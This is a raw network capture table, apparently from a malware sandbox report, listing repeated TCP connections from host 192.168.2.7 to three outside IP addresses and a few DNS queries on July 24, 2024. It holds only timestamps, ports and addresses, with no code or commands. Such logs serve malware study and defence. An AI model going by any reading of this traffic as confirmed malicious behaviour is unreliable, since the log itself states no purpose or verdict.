Jul 24, 2024 15:08:23.073792934 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.086041927 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.086126089 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.086457968 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.092784882 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.096669912 CEST	443	49707	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.096892118 CEST	443	49707	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.096946955 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.097527027 CEST	49707	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.103072882 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.109998941 CEST	80	49710	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.110069036 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.110166073 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.115142107 CEST	80	49710	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.676656961 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.687436104 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.693418026 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.719739914 CEST	80	49710	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.720948935 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.720995903 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.721086979 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.721333981 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.721348047 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.769025087 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:23.846412897 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:23.914058924 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.914102077 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.914252996 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.918582916 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:23.918598890 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:23.925283909 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.202778101 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.204476118 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.204499006 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.329875946 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.329971075 CEST	443	49712	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.332369089 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.332885027 CEST	49712	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.336133003 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.337079048 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.341783047 CEST	80	49710	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:24.341846943 CEST	49710	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.342272997 CEST	80	49714	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:24.342339039 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.342401981 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:24.347321033 CEST	80	49714	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:24.407718897 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.407831907 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.409501076 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.409529924 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.410509109 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:24.456542015 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.576205015 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:24.620529890 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.003254890 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.003381968 CEST	443	49713	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.003429890 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.006664038 CEST	49713	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.009537935 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.021889925 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.104147911 CEST	80	49714	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.105362892 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.105398893 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.105530977 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.105756044 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.105765104 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.159748077 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.179019928 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.180777073 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.180892944 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.180994987 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.181263924 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.181294918 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.222165108 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.592849970 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.594640017 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.594656944 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.675904989 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.677514076 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.677553892 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.755223036 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.755347967 CEST	443	49715	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.755469084 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.755882025 CEST	49715	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.759516001 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.760431051 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.765552998 CEST	80	49717	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.765628099 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.765774012 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.766063929 CEST	80	49714	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.766233921 CEST	49714	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.770957947 CEST	80	49717	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.809308052 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.809523106 CEST	443	49716	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:25.809740067 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.810060024 CEST	49716	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:25.813555002 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.814800978 CEST	49718	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.818999052 CEST	80	49709	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.819171906 CEST	49709	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.819803953 CEST	80	49718	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:25.819899082 CEST	49718	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.820039034 CEST	49718	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:25.827128887 CEST	80	49718	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:26.338928938 CEST	80	49717	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:26.340445042 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.340568066 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:26.340652943 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.340883017 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.340903997 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:26.378408909 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:26.405514002 CEST	80	49718	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:26.406845093 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.406949043 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:26.407061100 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.407371044 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.407406092 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:26.456581116 CEST	49718	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:26.865969896 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:26.867495060 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:26.867522955 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.302017927 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.303878069 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:27.303920984 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.410937071 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.411070108 CEST	443	49719	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.411148071 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:27.411597013 CEST	49719	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:27.415052891 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.416167021 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.426629066 CEST	80	49721	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:27.426721096 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.426820993 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.431598902 CEST	80	49717	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:27.431660891 CEST	49717	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.433618069 CEST	80	49721	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:27.440862894 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.440964937 CEST	443	49720	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:27.441147089 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:27.441502094 CEST	49720	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:27.445837021 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.451667070 CEST	80	49722	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:27.451749086 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.451855898 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:27.457107067 CEST	80	49722	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.017930984 CEST	80	49721	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.020617962 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.020677090 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.020813942 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.021090031 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.021105051 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.037288904 CEST	80	49722	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.038629055 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.038657904 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.038769007 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.039252996 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.039263010 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.065947056 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.081589937 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.522593975 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.524837971 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.524924994 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.568397999 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.574436903 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.574472904 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.692552090 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.692791939 CEST	443	49723	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.693111897 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.693902969 CEST	49723	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.711930990 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.712219954 CEST	443	49724	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:28.712460041 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.729391098 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.740883112 CEST	80	49721	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.741677046 CEST	49721	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.750392914 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.755460024 CEST	80	49725	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.758610010 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.774483919 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.779738903 CEST	80	49725	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.793200970 CEST	49724	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:28.820739985 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.821741104 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.825925112 CEST	80	49726	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.826019049 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.826220989 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.827727079 CEST	80	49722	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:28.827788115 CEST	49722	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:28.841023922 CEST	80	49726	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:30.032037020 CEST	80	49725	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:30.033286095 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.033322096 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.033387899 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.033713102 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.033725023 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.081557989 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.127151012 CEST	80	49726	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:30.128828049 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.128869057 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.128932953 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.129194021 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.129210949 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.175314903 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.565747023 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.568068981 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.568092108 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.641524076 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.644226074 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.644257069 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.700969934 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.701225996 CEST	443	49727	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.701467037 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.701950073 CEST	49727	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.787667036 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.787817955 CEST	443	49728	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:30.788737059 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.788738012 CEST	49728	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:30.791801929 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.792789936 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.797519922 CEST	80	49726	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:30.797653913 CEST	49726	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.798162937 CEST	80	49729	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:30.800734043 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.800734043 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:30.806484938 CEST	80	49729	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:32.402692080 CEST	80	49729	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:32.404115915 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:32.404170990 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:32.404288054 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:32.404520035 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:32.404535055 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:32.456588984 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:32.889738083 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:32.891393900 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:32.891429901 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:33.041904926 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:33.042135954 CEST	443	49730	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:33.042236090 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:33.044400930 CEST	49730	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:33.045779943 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:33.046978951 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:33.053464890 CEST	80	49729	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:33.053492069 CEST	80	49731	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:33.053561926 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:33.053560972 CEST	49729	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:33.053721905 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:33.062200069 CEST	80	49731	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.086693048 CEST	80	49731	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.088406086 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.088454962 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.088547945 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.088893890 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.088907957 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.128474951 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.576287031 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.578387022 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.578427076 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.742038965 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.742132902 CEST	443	49732	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:35.742183924 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.742670059 CEST	49732	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:35.746273994 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.746884108 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.751800060 CEST	80	49731	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.751877069 CEST	49731	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.751993895 CEST	80	49734	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.752049923 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.752161980 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.758624077 CEST	80	49734	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.959789991 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.965588093 CEST	80	49725	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:35.965715885 CEST	49725	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:35.970580101 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:35.970634937 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:35.970776081 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:35.972100973 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:35.972126007 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.624759912 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.624955893 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:36.626970053 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:36.626980066 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.627259016 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.628910065 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:36.672502995 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.672712088 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:36.672729015 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.970977068 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.971194983 CEST	443	49735	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:36.971328974 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:36.971887112 CEST	49735	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:37.506752968 CEST	80	49734	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:37.514086008 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:37.514144897 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:37.514399052 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:37.515170097 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:37.515183926 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:37.550327063 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:37.987356901 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:37.997589111 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:37.997627020 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:38.120304108 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:38.120413065 CEST	443	49740	188.114.97.3	192.168.2.7
Jul 24, 2024 15:08:38.123749971 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:38.124896049 CEST	49740	443	192.168.2.7	188.114.97.3
Jul 24, 2024 15:08:43.317800999 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:43.318099976 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.318151951 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.318218946 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.318583965 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.318594933 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.324561119 CEST	80	49734	158.101.44.242	192.168.2.7
Jul 24, 2024 15:08:43.324620008 CEST	49734	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:08:43.941622019 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.941700935 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.944926977 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.944936991 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.945152044 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.946635008 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.988508940 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:43.988569975 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:43.988581896 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:44.499490023 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:44.524349928 CEST	443	49741	149.154.167.220	192.168.2.7
Jul 24, 2024 15:08:44.524424076 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:08:44.524966955 CEST	49741	443	192.168.2.7	149.154.167.220
Jul 24, 2024 15:09:27.033144951 CEST	80	49706	158.101.44.242	192.168.2.7
Jul 24, 2024 15:09:27.033402920 CEST	49706	80	192.168.2.7	158.101.44.242
Jul 24, 2024 15:09:31.406105042 CEST	80	49718	158.101.44.242	192.168.2.7
Jul 24, 2024 15:09:31.406229019 CEST	49718	80	192.168.2.7	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 15:08:19.028949976 CEST	59276	53	192.168.2.7	1.1.1.1
Jul 24, 2024 15:08:19.037156105 CEST	53	59276	1.1.1.1	192.168.2.7
Jul 24, 2024 15:08:19.867918968 CEST	65140	53	192.168.2.7	1.1.1.1
